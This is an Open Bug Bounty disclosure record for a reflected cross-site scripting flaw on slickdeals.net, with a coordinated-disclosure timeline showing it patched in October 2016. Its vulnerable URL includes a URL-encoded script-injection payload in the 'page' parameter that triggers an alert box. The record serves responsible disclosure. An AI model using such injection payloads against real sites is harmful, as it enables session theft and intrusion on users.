slickdeals.net XSS vulnerability

2016-09-20T11:20:00
ID OBB:182657
Type openbugbounty
Reporter tbm
Modified 2016-10-20T06:12:00

Description

Vulnerable URL:
http://slickdeals.net/newsearch.php?page=4%27%22%3E%3CScRiPt+%3Ealert%28%2FOPENBUGBOUNTY%2F%29%3C%2FScRiPt%3E&previousdays;=-1&rating;=&searcharea;=deals&searchin;=first&sort;=relevance
Details:

Description| Value
---|---
Patched:| Yes, at 19.10.2016
Latest check for patch:| 19.10.2016 12:45 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 399
VIP website status:| Yes
Check slickdeals.net SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 September, 2016 11:20 GMT
Generic security notifications sent to website owner| 20 September, 2016 11:23 GMT
Vulnerability patched by the website owner| 20 October, 2016 05:02 GMT
Vulnerability details disclosed by researcher| 20 October, 2016 06:12 GMT